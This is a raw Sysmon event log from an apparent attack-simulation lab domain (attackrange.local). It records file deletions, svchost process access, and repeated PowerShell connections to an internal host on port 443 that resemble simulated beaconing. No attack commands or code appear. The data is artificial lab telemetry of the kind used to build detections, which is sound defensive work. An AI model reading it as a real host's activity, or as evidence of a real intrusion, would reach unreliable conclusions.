13:21:40.332{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FF4E61E86D0E04B2505E60695DC74636,SHA256=1DE49EB2DDE282D17590F0CF031DC7DD9B419D9D5971F9168087C9588EA49D44,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498399Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:40.211{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\datareporting\glean\db\data.safe.binMD5=DE0BEDE727BF276B0E884A3A1931D34A,SHA256=853265F82E28643AF3433354139AA6672978923880CA09DCF55C94E206D969D0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498398Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:40.211{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\datareporting\glean\db\data.safe.binMD5=27091BF846D3450F042278ED0E8EF315,SHA256=2877121CF46F2750F623DC56FC2F18DA5D7F4C501F64F5A6979D08910F6D041B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498397Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:40.211{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\datareporting\glean\db\data.safe.binMD5=921755F56E4F752E51F77868B2CF74EF,SHA256=B6521466F32C7E730F6F441ECEF95795F5979C813EF306944D1F6492F9060757,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498396Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:40.211{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\datareporting\glean\db\data.safe.binMD5=A5B16986C7A0A587835D22A27A49AB65,SHA256=ADD246A315B4443CDE30336D96156DC79197D7884D0A4F9C4CC8C908E8A806FA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498395Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:40.211{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\datareporting\glean\db\data.safe.binMD5=DE262C56AAE1BB2EA953020346653997,SHA256=83281E435ABE5B0E7C10E25E2FD8A432FBC5ECFCEC6EA48D996F372D65E36A3C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498394Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:40.211{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\datareporting\glean\db\data.safe.binMD5=5671D7903FC2EA75F5F9ABA3879A4B37,SHA256=44B43222528F9BD2A079BDBB5C6A93B218650D4C29C514BF7085558CD3A0910E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498403Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:41.978{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=571789DAA38C070C7C62FDC3B5BD624F,SHA256=4EA5123BC024F6E63A6D198891F086A8EE4CB6F6203E364942CEB9E1818ABB9B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498402Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:41.330{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=24360BD64185801AAA068C59CDF2C4B6,SHA256=DFA7859D8C7D69F48CF8B9D7BFA9E3352A52B50B1F742E5AAA9826EDAAB5086A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498405Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:42.992{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9B518665B5145CDBA18121CD627BEE3F,SHA256=9C840786415FF2DF373D70C9A43590FF738DBD980360C28F53BBAA6492067FEA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036498404Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:11.985{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50641-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000036498406Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:12.767{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50642-false10.0.1.12-8000- 23542300x800000000000000036498407Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:44.007{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5400E1F3A684C7701F67B3835F91CA9A,SHA256=ABFD9557F91D39EC5035C4FF63E306E8798C1C2B28F7E64EF7EEEF4DAE7081A8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498408Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:45.024{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=208EC3DA755E31A9BC19D6C223DDE6B8,SHA256=A26E8B29B7FABC1EFD4914BC8E122957CD5C3C1A63C8ADD23A10ACA9E3176F12,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498409Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:46.035{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D8BA3A2EE8010E81C220824BFF2BFE53,SHA256=4A073FCFCBE0AE4FCAAA35D5D54B012812054C88443EAF271E08B9064FB10ECA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498411Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:47.365{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=6D938A1765FD780E550F92769A107844,SHA256=84D48FEAB030D49D6F0FE5919D7E19EA3BB0C1A34A3276483434F65944FE5114,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498410Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:47.097{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AC7EBF651B6A5689F1E45622654C77DB,SHA256=AD65222D4FF6B3CA1882623B75FCE5207BAD725CA22212277CC8095B2617769A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036498413Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:17.987{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50643-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036498412Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:48.130{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7F6C14ECBAAF63225363F629AE70EE69,SHA256=6E09C2D2921B679F1273A1DD106EF87850E720668F624FA62735123521100F41,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036498415Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:18.755{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50644-false10.0.1.12-8000- 23542300x800000000000000036498414Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:49.148{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AE5446C4DEE36D4756B7FC54B6901414,SHA256=A5C40B118C0D22BA339907259B9205376311D7CBAD56E364152F36683D83EAB4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498422Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:50.247{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\datareporting\glean\db\data.safe.binMD5=94EE7478F06575D2F80F3D1A900A05BD,SHA256=EE7285805F15307AE2A9BA321D1B40AE693EDC12EF7A743FCC2CCB4355D14948,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498421Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:50.247{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\datareporting\glean\db\data.safe.binMD5=E3227DEC93C31D2C343C339330D1721A,SHA256=EC086565DDD33ED43329561E01EA34AA6BDD0D9CA7A964AF156A990C7FF657A6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498420Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:50.247{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\datareporting\glean\db\data.safe.binMD5=24427C632F3984380EF12E8762DBA20F,SHA256=2B9F75D9B0A2674226D9325C81C5F8E0BD8C738B1827C70D371A585692D553F5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498419Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:50.247{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\datareporting\glean\db\data.safe.binMD5=1B6DC47190A8110F11F6AE04414B6227,SHA256=F6D0AF715A09102D8B6F9086D9DF3A171B2BB3E8C451FB37392C07932C463EDE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498418Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:50.247{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\datareporting\glean\db\data.safe.binMD5=B2280E217C8E3CB8CE0ADC254507F431,SHA256=46DB373D5BEB649735F7F066D226416626FB2DD0D3311FC483B0B492974FF72B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498417Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:50.247{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\datareporting\glean\db\data.safe.binMD5=49ACF27BF956716F967696DB6C9C04EB,SHA256=83FF94AB312A8B1B8A01974634CD0186329C67E48C4E1DA6B476AD9BBBC9A703,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498416Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:50.163{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E835DF9F5BAA4AFA49348ABA68814096,SHA256=68D60CEBE14EACDA7B769B8DA047C5ED4A0B89F64DD1667FF30D6D735DF27E39,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498423Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:51.177{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5F92AAED0E3F4F61A539D3A75C475950,SHA256=8E4F0B13D4E641D1081B5F8EAE68ECF7BB76689C87D24DFF1E05AB552F125DD5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498424Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:52.192{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9D61A2D79E99082E4DDD91F194B4F389,SHA256=764D9B66BD3B5929A4A024BD0B4275F8BE299DE596804420BDFED84ECF7D2A35,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498426Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:53.525{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=01CF0A0623893B1B59FB3C8865074BF8,SHA256=57A0E4EDC4309834BB55BD017758DCB998A536A50D46A78101A140911F4588AD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498425Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:53.206{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=054472FD07EFE635C4E8BD01238ED457,SHA256=A325BD60F75E87E8C34B77633149CD856C95021F0E2FC13E4D8643F6C9C87AAA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036498429Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:23.997{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50646-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000036498428Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:23.766{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50645-false10.0.1.12-8000- 23542300x800000000000000036498427Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:54.226{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D46CD9A629D9F105F391E52C4816DBCE,SHA256=129F061A022D71F02FC832C750714297BBB411144246C9B601578362EC8F345A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498430Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:55.290{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=71257CA0B3849829AFC6D1D17760854B,SHA256=E478D8B98A7090CD39087C492B0B7FF5B3937A2894163DFC919C0CCAB14E1332,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498432Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:56.305{B81B27B7-2BC4-612D-7CF4-01000000C801}4056ATTACKRANGE\REED_SCHMIDTC:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exeC:\Users\reed_schmidt\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\4056.xml~RF8a36e647.TMPMD5=7FFA55FF6AC84742FC67B49B83BE3F12,SHA256=786CB96E30E42C16784374E9E5E14298976752E69CFAAF7FCB2ED016D9E3B6BB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498431Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:56.305{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=58F27D77AA9AEBF4DD83B487722E8713,SHA256=19501E26FA745464DEC5B21BCDE39EAE3C8987576B1A58636C4D19D034BE0D87,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036498436Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:57.556{B81B27B7-4012-611D-0D00-00000000C801}7925132C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-1600-00000000C801}1196C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498435Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:57.556{B81B27B7-4012-611D-0D00-00000000C801}7925132C:\Windows\system32\svchost.exe{B81B27B7-429F-611D-0601-00000000C801}5536C:\Windows\system32\ServerManager.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000036498434Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:57.324{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=EB26B0AC0C20675A262EC162BC94F220,SHA256=C339E229BFCEAA7F194E41B265CF3A40E68DE80EC400FE35A3A0E38810C67707,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498433Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:57.323{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2D07F70246CC620B6FB431675A42FF3E,SHA256=A154A9368E1F770CC9942E784325992FF3AE10896755492AD82B85692899F4F2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036498438Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:28.010{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50647-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036498437Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:58.340{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1AABF5AD1523BE2E7C2421881E5AF46E,SHA256=334FA333DC0CDDB8E783F3705C77191B19B33F9087BD1ACCFA3F29E3402E3796,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036498441Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:29.776{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50648-false10.0.1.12-8000- 23542300x800000000000000036498440Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:59.365{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F9B6799126095F48FD23E168889A6D95,SHA256=D1BC0F9DFB6188BA55FEA0349B1B887428BA0F79F0A2003830F0D4DC196DB126,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036498439Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:59.365{B81B27B7-4012-611D-0D00-00000000C801}7925132C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-1600-00000000C801}1196C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498480Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:00.595{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-1F2E-6131-9C70-02000000C801}6620C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498479Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:00.595{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-1F2E-6131-9C70-02000000C801}6620C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498478Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:00.595{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 